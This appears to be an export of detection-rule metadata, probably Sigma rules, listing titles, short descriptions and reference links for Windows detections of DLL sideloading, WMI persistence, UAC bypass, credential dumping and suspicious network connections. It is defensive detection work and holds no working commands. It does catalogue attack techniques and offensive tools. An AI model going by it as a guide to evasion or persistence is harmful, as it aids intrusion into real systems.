https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/, https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py |
Wmiprvse Wbemcomn DLL Hijack - File |
Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. |
https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html |
WMI Persistence - Script Event Consumer File Write |
Detects file writes of WMI script event consumer |
https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ |
UEFI Persistence Via Wpbbin - FileCreation |
Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method |
https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c, https://persistence-info.github.io/Data/wpbbin.html |
Writing Local Admin Share |
Aversaries may use to interact with a remote network share using Server Message Block (SMB).
This technique is used by post-exploitation frameworks.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share |
Potentially Suspicious Self Extraction Directive File Created |
Detects the creation of a binary file with the ".sed" extension. The ".sed" extension stand for Self Extraction Directive files.
These files are used by the "iexpress.exe" utility in order to create self extracting packages.
Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
Usually ".sed" files are simple ini files and not PE binaries.
|
https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html, https://en.wikipedia.org/wiki/IExpress, https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior |
DLL Loaded From Suspicious Location Via Cmspt.EXE |
Detects cmstp loading "dll" or "ocx" files from suspicious locations |
https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml |
Suspicious Appended Extension |
Detects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as ".jpg.crypted", ".docx.locky", etc. |
https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/, https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/ |
Amsi.DLL Loaded Via LOLBIN Process |
Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack |
Internal Research, https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/ |
Potential Azure Browser SSO Abuse |
Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.
An attacker can use this to authenticate to Azure AD in a browser as that user.
|
https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30 |
Suspicious Renamed Comsvcs DLL Loaded By Rundll32 |
Detects rundll32 loading a renamed comsvcs.dll to dump process memory |
https://twitter.com/sbousseaden/status/1555200155351228419 |
CredUI.DLL Loaded By Uncommon Process |
Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW". |
https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password, https://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa, https://github.com/S12cybersecurity/RDPCredentialStealer |
Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded |
Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.
Tools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.
As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.
|
https://learn.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump, https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html, https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6 |
PCRE.NET Package Image Load |
Detects processes loading modules related to PCRE.NET package |
https://twitter.com/rbmaslen/status/1321859647091970051, https://twitter.com/tifkin_/status/1321916444557365248 |
Load Of RstrtMgr.DLL By A Suspicious Process |
Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.
This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
It could also be used for anti-analysis purposes by shut downing specific processes.
|
https://www.crowdstrike.com/blog/windows-restart-manager-part-1/, https://www.crowdstrike.com/blog/windows-restart-manager-part-2/, https://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/, https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html |
Load Of RstrtMgr.DLL By An Uncommon Process |
Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process.
This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
It could also be used for anti-analysis purposes by shut downing specific processes.
|
https://www.crowdstrike.com/blog/windows-restart-manager-part-1/, https://www.crowdstrike.com/blog/windows-restart-manager-part-2/, https://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/, https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html |
Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE |
Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library |
https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/ |
Time Travel Debugging Utility Usage - Image |
Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. |
https://lolbas-project.github.io/lolbas/Binaries/Tttracer/, https://twitter.com/mattifestation/status/1196390321783025666, https://twitter.com/oulusoyum/status/1191329746069655553 |
PowerShell Core DLL Loaded By Non PowerShell Process |
Detects loading of essential DLLs used by PowerShell by non-PowerShell process.
Detects behavior similar to meterpreter's "load powershell" extension.
|
https://adsecurity.org/?p=2921, https://github.com/p3nt4/PowerShdll |
Suspicious Volume Shadow Copy Vssapi.dll Load |
Detects the image load of VSS DLL by uncommon executables |
https://github.com/ORCx41/DeleteShadowCopies |
Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load |
Detects the image load of VSS DLL by uncommon executables |
https://github.com/ORCx41/DeleteShadowCopies |
Suspicious Volume Shadow Copy VSS_PS.dll Load |
Detects the image load of vss_ps.dll by uncommon executables |
https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add, https://twitter.com/am0nsec/status/1412232114980982787 |
HackTool - SILENTTRINITY Stager DLL Load |
Detects SILENTTRINITY stager dll loading activity |
https://github.com/byt3bl33d3r/SILENTTRINITY |
HackTool - SharpEvtMute DLL Load |
Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs |
https://github.com/bats3c/EvtMute |
Potential DCOM InternetExplorer.Application DLL Hijack - Image Load |
Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class |
https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html |
Unsigned Image Loaded Into LSASS Process |
Loading unsigned image (DLL, EXE) into LSASS process |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
CLR DLL Loaded Via Office Applications |
Detects CLR DLL being loaded by an Office Product |
https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 |
DotNET Assembly DLL Loaded Via Office Application |
Detects any assembly DLL being loaded by an Office Product |
https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 |
Active Directory Parsing DLL Loaded Via Office Application |
Detects DSParse DLL being loaded by an Office Product |
https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 |
GAC DLL Loaded Via Office Applications |
Detects any GAC DLL being loaded by an Office Product |
https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 |
Microsoft Excel Add-In Loaded From Uncommon Location |
Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location |
https://www.mandiant.com/resources/blog/lnk-between-browsers, https://wazuh.com/blog/detecting-xll-files-used-for-dropping-fin7-jssloader-with-wazuh/ |
Active Directory Kerberos DLL Loaded Via Office Application |
Detects Kerberos DLL being loaded by an Office Product |
https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 |
Microsoft VBA For Outlook Addin Loaded Via Outlook |
Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process |
https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=58 |
VBA DLL Loaded Via Office Application |
Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros. |
https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 |
PowerShell Core DLL Loaded Via Office Application |
Detects PowerShell core DLL being loaded by an Office Product |
Internal Research |
Remote DLL Load Via Rundll32.EXE |
Detects a remote DLL load event via "rundll32.exe". |
https://github.com/gabe-k/themebleed, Internal Research |
WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load |
Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity. |
https://twitter.com/HunterPlaybook/status/1301207718355759107, https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/, https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html |
Potential 7za.DLL Sideloading |
Detects potential DLL sideloading of "7za.dll" |
https://www.gov.pl/attachment/ee91f24d-3e67-436d-aa50-7fa56acf789d |
Abusable DLL Potential Sideloading From Suspicious Location |
Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations |
https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html, https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/ |
Potential Antivirus Software DLL Sideloading |
Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc |
https://hijacklibs.net/ |
Potential appverifUI.DLL Sideloading |
Detects potential DLL sideloading of "appverifUI.dll" |
https://web.archive.org/web/20220519091349/https://fatrodzianko.com/2020/02/15/dll-side-loading-appverif-exe/ |
Aruba Network Service Potential DLL Sideloading |
Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking |
https://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09 |
Potential AVKkid.DLL Sideloading |
Detects potential DLL sideloading of "AVKkid.dll" |
https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/ |
Potential CCleanerDU.DLL Sideloading |
Detects potential DLL sideloading of "CCleanerDU.dll" |
https://lab52.io/blog/2344-2/ |
Potential CCleanerReactivator.DLL Sideloading |
Detects potential DLL sideloading of "CCleanerReactivator.dll" |
https://lab52.io/blog/2344-2/ |
Potential Chrome Frame Helper DLL Sideloading |
Detects potential DLL sideloading of "chrome_frame_helper.dll" |
https://hijacklibs.net/entries/3rd_party/google/chrome_frame_helper.html |
Potential DLL Sideloading Via ClassicExplorer32.dll |
Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software |
https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets, https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/ |
Potential DLL Sideloading Via comctl32.dll |
Detects potential DLL sideloading using comctl32.dll to obtain system privileges |
https://github.com/binderlabs/DirCreate2System, https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt |
Potential DLL Sideloading Using Coregen.exe |
Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs. |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/ |
Potential DLL Sideloading Of DBGCORE.DLL |
Detects DLL sideloading of "dbgcore.dll" |
https://hijacklibs.net/ |
System Control Panel Item Loaded From Uncommon Location |
Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading. |
https://www.hexacorn.com/blog/2024/01/06/1-little-known-secret-of-fondue-exe/, https://www.hexacorn.com/blog/2024/01/01/1-little-known-secret-of-hdwwiz-exe/ |
Potential DLL Sideloading Of DBGHELP.DLL |
Detects potential DLL sideloading of "dbghelp.dll" |
https://hijacklibs.net/ |
Potential DLL Sideloading Of DbgModel.DLL |
Detects potential DLL sideloading of "DbgModel.dll" |
https://hijacklibs.net/entries/microsoft/built-in/dbgmodel.html |
Potential EACore.DLL Sideloading |
Detects potential DLL sideloading of "EACore.dll" |
https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/ |
Potential Edputil.DLL Sideloading |
Detects potential DLL sideloading of "edputil.dll" |
https://alternativeto.net/news/2023/5/cybercriminals-use-wordpad-vulnerability-to-spread-qbot-malware/ |
Potential System DLL Sideloading From Non System Locations |
Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.). |
https://hijacklibs.net/, https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/, https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/, https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md, https://www.hexacorn.com/blog/2023/12/26/1-little-known-secret-of-runonce-exe-32-bit/ |
Potential Goopdate.DLL Sideloading |
Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf |
Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE |
Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location |
https://labs.withsecure.com/publications/fin7-target-veeam-servers |
Potential Iviewers.DLL Sideloading |
Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer) |
https://www.secureworks.com/research/shadowpad-malware-analysis |
Potential DLL Sideloading Via JsSchHlp |
Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor |
https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/, http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp |
Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE |
Detects potential DLL side loading of "KeyScramblerIE.dll" by "KeyScrambler.exe".
Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe".
|
https://thehackernews.com/2024/03/two-chinese-apt-groups-ramp-up-cyber.html, https://csirt-cti.net/2024/02/01/stately-taurus-continued-new-information-on-cyberespionage-attacks-against-myanmar-military-junta/, https://bazaar.abuse.ch/sample/5cb9876681f78d3ee8a01a5aaa5d38b05ec81edc48b09e3865b75c49a2187831/, https://twitter.com/Max_Mal_/status/1775222576639291859, https://twitter.com/DTCERT/status/1712785426895839339 |
Potential Libvlc.DLL Sideloading |
Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe" |
https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html, https://hijacklibs.net/entries/3rd_party/vlc/libvlc.html |
Potential Mfdetours.DLL Sideloading |
Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution. |
Internal Research |
Unsigned Mfdetours.DLL Sideloading |
Detects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution. |
Internal Research |
Potential DLL Sideloading Of MpSvc.DLL |
Detects potential DLL sideloading of "MpSvc.dll". |
https://hijacklibs.net/entries/microsoft/built-in/mpsvc.html |
Potential DLL Sideloading Of MsCorSvc.DLL |
Detects potential DLL sideloading of "mscorsvc.dll". |
https://hijacklibs.net/entries/microsoft/built-in/mscorsvc.html |
Potential DLL Sideloading Of Non-Existent DLLs From System Folders |
Detects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories).
Usually this technique is used to achieve UAC bypass or privilege escalation.
|
https://decoded.avast.io/martinchlumecky/png-steganography/, https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992, https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/, https://github.com/Wh04m1001/SysmonEoP, https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/, http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html |
Microsoft Office DLL Sideload |
Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location |
https://hijacklibs.net/ |
Potential Python DLL SideLoading |
Detects potential DLL sideloading of Python DLL files. |
https://www.securonix.com/blog/seolurker-attack-campaign-uses-seo-poisoning-fake-google-ads-to-install-malware/, https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/, https://github.com/wietze/HijackLibs/tree/dc9c9f2f94e6872051dab58fbafb043fdd8b4176/yml/3rd_party/python |
Potential Rcdll.DLL Sideloading |
Detects potential DLL sideloading of rcdll.dll |
https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html |
Potential RjvPlatform.DLL Sideloading From Default Location |
Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default. |
https://twitter.com/0gtweet/status/1666716511988330499 |
Potential RjvPlatform.DLL Sideloading From Non-Default Location |
Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location. |
https://twitter.com/0gtweet/status/1666716511988330499 |
Potential RoboForm.DLL Sideloading |
Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager |
https://twitter.com/StopMalvertisin/status/1648604148848549888, https://twitter.com/t3ft3lb/status/1656194831830401024, https://www.roboform.com/ |
Potential ShellDispatch.DLL Sideloading |
Detects potential DLL sideloading of "ShellDispatch.dll" |
https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/ |
DLL Sideloading Of ShellChromeAPI.DLL |
Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL.
Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
|
https://mobile.twitter.com/0gtweet/status/1564131230941122561, https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html |
Potential SmadHook.DLL Sideloading |
Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus |
https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/, https://www.qurium.org/alerts/targeted-malware-against-crph/ |
Potential SolidPDFCreator.DLL Sideloading |
Detects potential DLL sideloading of "SolidPDFCreator.dll" |
https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/ |
Third Party Software DLL Sideloading |
Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc) |
https://hijacklibs.net/ |
Fax Service DLL Search Order Hijack |
The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service. |
https://windows-internals.com/faxing-your-way-to-system/ |
Potential Vivaldi_elf.DLL Sideloading |
Detects potential DLL sideloading of "vivaldi_elf.dll" |
https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/ |
VMGuestLib DLL Sideload |
Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service. |
https://decoded.avast.io/martinchlumecky/png-steganography/ |
VMMap Signed Dbghelp.DLL Potential Sideloading |
Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap. |
https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766 |
VMMap Unsigned Dbghelp.DLL Potential Sideloading |
Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap. |
https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766 |
Potential DLL Sideloading Via VMware Xfer |
Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL |
https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/ |
Potential Waveedit.DLL Sideloading |
Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software. |
https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html |
Potential Wazuh Security Platform DLL Sideloading |
Detects potential DLL side loading of DLLs that are part of the Wazuh security platform |
https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html |
Potential Mpclient.DLL Sideloading |
Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. |
https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool |
Potential WWlib.DLL Sideloading |
Detects potential DLL sideloading of "wwlib.dll" |
https://twitter.com/WhichbufferArda/status/1658829954182774784, https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/, https://securelist.com/apt-luminousmoth/103332/ |
Windows Spooler Service Suspicious Binary Load |
Detect DLL Load from Spooler Service backup folder |
https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://github.com/ly4k/SpoolFool |
Unsigned Module Loaded by ClickOnce Application |
Detects unsigned module load by ClickOnce application. |
https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 |
DLL Load By System Process From Suspicious Locations |
Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public" |
https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea) |
Python Image Load By Non-Python Process |
Detects the image load of "Python Core" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe. |
https://www.py2exe.org/, https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/ |
DotNet CLR DLL Loaded By Scripting Applications |
Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution. |
https://github.com/tyranid/DotNetToJScript, https://thewover.github.io/Introducing-Donut/, https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html, https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008 |
Unsigned DLL Loaded by Windows Utility |
Detects windows utilities loading an unsigned or untrusted DLL.
Adversaries often abuse those programs to proxy execution of malicious code.
|
https://www.elastic.co/security-labs/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion, https://akhere.hashnode.dev/hunting-unsigned-dlls-using-kql, https://unit42.paloaltonetworks.com/unsigned-dlls/?web_view=true |
Suspicious Unsigned Thor Scanner Execution |
Detects loading and execution of an unsigned thor scanner binary. |
Internal Research |
UAC Bypass Using Iscsicpl - ImageLoad |
Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH% |
https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC, https://twitter.com/wdormann/status/1547583317410607110 |
UAC Bypass With Fake DLL |
Attempts to load dismcore.dll after dropping it |
https://steemit.com/utopian-io/@ah101/uac-bypassing-utility |
WMIC Loading Scripting Libraries |
Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). |
https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html, https://twitter.com/dez_/status/986614411711442944, https://lolbas-project.github.io/lolbas/Binaries/Wmic/ |
Wmiprvse Wbemcomn DLL Hijack |
Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. |
https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html |
WMI Persistence - Command Line Event Consumer |
Detects WMI command line event consumers |
https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ |
Suspicious WSMAN Provider Image Loads |
Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution. |
https://twitter.com/chadtilbury/status/1275851297770610688, https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/, https://learn.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture, https://github.com/bohops/WSMan-WinRM |
Network Connection Initiated By AddinUtil.EXE |
Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe".
This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
|
https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html |
Uncommon Connection to Active Directory Web Services |
Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.
|
https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c, https://github.com/FalconForceTeam/FalconFriday/blob/master/Discovery/ADWS_Connection_from_Unexpected_Binary-Win.md |
Uncommon Network Connection Initiated By Certutil.EXE |
Detects a network connection initiated by the certutil.exe utility.
Attackers can abuse the utility in order to download malware or additional payloads.
|
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil |
Outbound Network Connection Initiated By Cmstp.EXE |
Detects a network connection initiated by Cmstp.EXE
Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
|
https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ |
Outbound Network Connection Initiated By Microsoft Dialer |
Detects outbound network connection initiated by Microsoft Dialer.
The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer.
This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys"
|
https://tria.ge/240301-rk34sagf5x/behavioral2, https://app.any.run/tasks/6720b85b-9c53-4a12-b1dc-73052a78477d, https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/, https://strontic.github.io/xcyclopedia/library/dialer.exe-0B69655F912619756C704A0BF716B61F.html |
Network Connection Initiated To AzureWebsites.NET By Non-Browser Process |
Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
|
https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/, https://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/, https://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/ |
Network Connection Initiated To BTunnels Domains |
Detects network connections to BTunnels domains initiated by a process on the system.
Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
|
https://defr0ggy.github.io/research/Utilizing-BTunnel-For-Data-Exfiltration/ |
Network Connection Initiated To Cloudflared Tunnels Domains |
Detects network connections to Cloudflared tunnels domains initiated by a process on the system.
Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
|
https://defr0ggy.github.io/research/Abusing-Cloudflared-A-Proxy-Service-To-Host-Share-Applications/, https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/, Internal Research |
Network Communication With Crypto Mining Pool |
Detects initiated network connections to crypto mining pools |
